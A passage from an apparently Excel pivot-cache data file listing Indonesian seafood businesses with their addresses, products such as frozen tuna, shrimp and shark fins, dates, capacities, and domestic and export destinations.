    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21411"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="1000000000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21412"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21413"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Asin Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21414"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Hidup"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21415"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21416"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Siput Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="1000000000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21417"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Kering (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21418"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21419"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="200000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21420"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21421"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21422"/>
    <x v="518"/>
    <s v="PT. ANUGERAH MINA SEJAHTERA"/>
    <s v="Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Scombroid Beku (Salem)"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="200000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21423"/>
    <x v="109"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes Lor, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Scallop Beku"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="21425"/>
    <x v="45"/>
    <s v="PT. BINTANG JAYAKOTA MANDIRI"/>
    <s v="Jl. Ikan Tuna Raya IV No.16, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Hiu Beku"/>
    <d v="2020-07-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Australia, China, Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21426"/>
    <x v="109"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes Lor, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Makerel Atlantik)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="148000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21427"/>
    <x v="109"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes Lor, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Beku"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="321000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="21430"/>
    <x v="271"/>
    <s v="RANAFRA"/>
    <s v="Jl. Pala Barat II Blok L No.13, Kel. Mejasem Barat, Kec. Kramat, Kabupaten Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerupuk Ikan"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="240"/>
    <s v="Kabupaten Pemalang, Kabupaten Tegal, Kabupaten Brebes"/>
    <m/>
  </r>
  <r>
    <n v="21431"/>
    <x v="271"/>
    <s v="RANAFRA"/>
    <s v="Jl. Pala Barat II Blok L No.13, Kel. Mejasem Barat, Kec. Kramat, Kabupaten Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Pangsit Keong"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Pemalang, Kabupaten Tegal, Kabupaten Brebes"/>
    <m/>
  </r>
  <r>
    <n v="21433"/>
    <x v="519"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4 E, Kel. Tandes, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="2493721"/>
    <m/>
    <s v="Belgium, France, Germany, Netherlands, United States"/>
  </r>
  <r>
    <n v="21434"/>
    <x v="519"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4 E, Kel. Tandes, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="2737361"/>
    <m/>
    <s v="Belgium, France, Germany, Netherlands, United States"/>
  </r>
  <r>
    <n v="21435"/>
    <x v="519"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4 E, Kel. Tandes, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="3554"/>
    <m/>
    <s v="Belgium, France, Germany, Netherlands, United States"/>
  </r>
  <r>
    <n v="21436"/>
    <x v="520"/>
    <s v="PT. HONGTAI LINTAS SAMUDRA"/>
    <s v="Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Philippines, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21437"/>
    <x v="520"/>
    <s v="PT. HONGTAI LINTAS SAMUDRA"/>
    <s v="Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Lobster Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Philippines, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21438"/>
    <x v="520"/>
    <s v="PT. HONGTAI LINTAS SAMUDRA"/>
    <s v="Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21439"/>
    <x v="520"/>
    <s v="PT. HONGTAI LINTAS SAMUDRA"/>
    <s v="Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21440"/>
    <x v="520"/>
    <s v="PT. HONGTAI LINTAS SAMUDRA"/>
    <s v="Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Swanggi, Kerapu, Layur, Kakatua, Bawal, Kakap, Kurisi, Barramundi)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21441"/>
    <x v="520"/>
    <s v="PT. HONGTAI LINTAS SAMUDRA"/>
    <s v="Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Layang, Sillago, Tenggiri, Ekor Kuning)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21442"/>
    <x v="520"/>
    <s v="PT. HONGTAI LINTAS SAMUDRA"/>
    <s v="Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21443"/>
    <x v="520"/>
    <s v="PT. HONGTAI LINTAS SAMUDRA"/>
    <s v="Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerang Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21444"/>
    <x v="520"/>
    <s v="PT. HONGTAI LINTAS SAMUDRA"/>
    <s v="Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Sidat Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21445"/>
    <x v="521"/>
    <s v="PT. SUMBER MINA SAMUDERA"/>
    <s v="Jl. Ikan Tuna Barat, Komplek SSU Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-07-08T00:00:00"/>
    <n v="216000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21446"/>
    <x v="521"/>
    <s v="PT. SUMBER MINA SAMUDERA"/>
    <s v="Jl. Ikan Tuna Barat, Komplek SSU Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-07-08T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21447"/>
    <x v="167"/>
    <s v="PT. INDONESIA BRAZIL COFFEE"/>
    <s v="Jl. Gatot Subroto Km 6,2 No.89 RT 003 RW 006, Kel. Keroncong, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Kepiting Kaleng"/>
    <d v="2020-09-28T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21451"/>
    <x v="522"/>
    <s v="PT. YASURIANG SAMUDERA REZEKI"/>
    <s v="Jl. Gabion Pelabuhan Perikanan Belawan No.98, Kel. Bagan Deli, Kec. Medan-Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kembung)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="21452"/>
    <x v="523"/>
    <s v="PT. TEMPO NAGADI TRADING"/>
    <s v="Jl. MT. Haryono No.7 RT 010 RW 006, Kel. Cawang, Kec. Kramat Jati, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Minyak Ikan"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Barat, Kabupaten Bekasi"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="21453"/>
    <x v="121"/>
    <s v="PT. KARYA PERSADA KHATULISTIWA"/>
    <s v="Jl. Mina Ayu RT 13 RW 04, Kel. Limbangan, Kec. Juntinyuat, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21456"/>
    <x v="524"/>
    <s v="PT. KANG YIH TRADING"/>
    <s v="Jl. Raya Maspion Romokalisari 1/7 (C-07), Kel. Romokalisari, Kec. Benowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-12-01T00:00:00"/>
    <n v="64000"/>
    <s v="Kota Makassar"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21460"/>
    <x v="525"/>
    <s v="PT. AZELIS INDONESIA DISTRIBUSI"/>
    <s v="Greenland International Industrial Center (GIIC), Jl. Boulevard Blok CB No.01, Desa Sukamukti, Kec. Bojong Mangu, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Karagenan"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="15400"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Bandung, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21461"/>
    <x v="23"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="Australia, France, Italy, Japan"/>
  </r>
  <r>
    <n v="21462"/>
    <x v="23"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Kerisi, Lencam, Biji Nangka, Kerapu, Kakatua, Kakap, Ekor Kuning, Barramundi)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="Australia, France, United States"/>
  </r>
  <r>
    <n v="21463"/>
    <x v="23"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="6000000"/>
    <m/>
    <s v="France, Italy, Japan, Netherlands, United States"/>
  </r>
  <r>
    <n v="21464"/>
    <x v="23"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="2000000"/>
    <m/>
    <s v="Australia, France, Italy, Netherlands"/>
  </r>
  <r>
    <n v="21465"/>
    <x v="23"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Amberjack, Lemuru, Mata Besar, Deho, Setan, Lemadang, Marlin, Semar, Sarden, Cakalang, Tenggiri, Todak)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="2000000"/>
    <m/>
    <s v="Australia, France, Italy, Netherlands"/>
  </r>
  <r>
    <n v="21466"/>
    <x v="23"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Gurita Rebus Beku"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="France, Italy, United States"/>
  </r>
  <r>
    <n v="21467"/>
    <x v="23"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Kerisi, Lencam, Biji Nangka, Kerapu, Kakatua, Kakap, Ekor Kuning, Barramundi)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="2000000"/>
    <m/>
    <s v="Australia, France, Italy, Netherlands"/>
  </r>
  <r>
    <n v="21468"/>
    <x v="214"/>
    <s v="KOPERASI SERBA USAHA SINAR BINTANG TERANG"/>
    <s v="Kampung Bugis, Kel. TPI Kota, Kec. TPI Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-09-15T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Batam, Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="21469"/>
    <x v="526"/>
    <s v="PT. MUNCHAR"/>
    <s v="Jl. Sampangan, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="9500"/>
    <s v="Kota Pangkal Pinang, Kota Tasikmalaya"/>
    <m/>
  </r>
  <r>
    <n v="21470"/>
    <x v="527"/>
    <s v="CV. SOLOP LESTARI"/>
    <s v="Pantai Solop RT 04 RW 03, Kel. Pulau Cawan, Kec. Mandah, Kabupaten Indragiri Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Siput Hidup"/>
    <d v="2020-08-07T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21471"/>
    <x v="520"/>
    <s v="PT. HONGTAI LINTAS SAMUDRA"/>
    <s v="Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Keong Hidup"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21472"/>
    <x v="528"/>
    <s v="ANTAMAIQ"/>
    <s v="Jl. Arwana 1 BTN Taman Mutiara, Kel. Pagutan Barat, Kec. Mataram, Kota Mataram&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Abon Ikan Gabus"/>
    <d v="2021-01-18T00:00:00"/>
    <n v="250"/>
    <s v="Kota Pekanbaru, Kota Jakarta Selatan, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Surakarta, Kota Salatiga, Kota Yogyakarta, Kabupaten Ponorogo, Kabupaten Jombang, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat, Kabupaten Lombok Tengah, Kabupaten Lombok Timur, Kabupaten Sumbawa, Kabupaten Sumbawa Barat, Kabupaten Lombok Utara, Kota Mataram, Kota Pontianak, Kota Banjarmasin, Kota Makassar, Kota Parepare, Kota Baubau"/>
    <m/>
  </r>
  <r>
    <n v="21473"/>
    <x v="529"/>
    <s v="PT. DWIRA MASAGENA"/>
    <s v="Jl. Kima Raya 1 Kav B5, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="21474"/>
    <x v="529"/>
    <s v="PT. DWIRA MASAGENA"/>
    <s v="Jl. Kima Raya 1 Kav B5, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Marlin, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="21475"/>
    <x v="529"/>
    <s v="PT. DWIRA MASAGENA"/>
    <s v="Jl. Kima Raya 1 Kav B5, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Marlin, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21476"/>
    <x v="529"/>
    <s v="PT. DWIRA MASAGENA"/>
    <s v="Jl. Kima Raya 1 Kav B5, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Anggoli, Kerapu, Layur, Sukang, Kakatua, Kakap, Kaci-kaci, Kurau)"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="21477"/>
    <x v="529"/>
    <s v="PT. DWIRA MASAGENA"/>
    <s v="Jl. Kima Raya 1 Kav B5, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Anggoli, Kerapu, Layur, Sukang, Kakatua, Kakap, Kaci-kaci, Kurau)"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21478"/>
    <x v="529"/>
    <s v="PT. DWIRA MASAGENA"/>
    <s v="Jl. Kima Raya 1 Kav B5, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="21479"/>
    <x v="529"/>
    <s v="PT. DWIRA MASAGENA"/>
    <s v="Jl. Kima Raya 1 Kav B5, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21480"/>
    <x v="529"/>
    <s v="PT. DWIRA MASAGENA"/>
    <s v="Jl. Kima Raya 1 Kav B5, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21481"/>
    <x v="530"/>
    <s v="PT. PERINTIS JAYA INTERNASIONAL"/>
    <s v="Jl. Ikan Tuna Raya Barat No.6 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Hiu Segar"/>
    <d v="2020-08-07T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="21482"/>
    <x v="530"/>
    <s v="PT. PERINTIS JAYA INTERNASIONAL"/>
    <s v="Jl. Ikan Tuna Raya Barat No.6 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Hiu Beku"/>
    <d v="2020-08-07T00:00:00"/>
    <n v="800000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
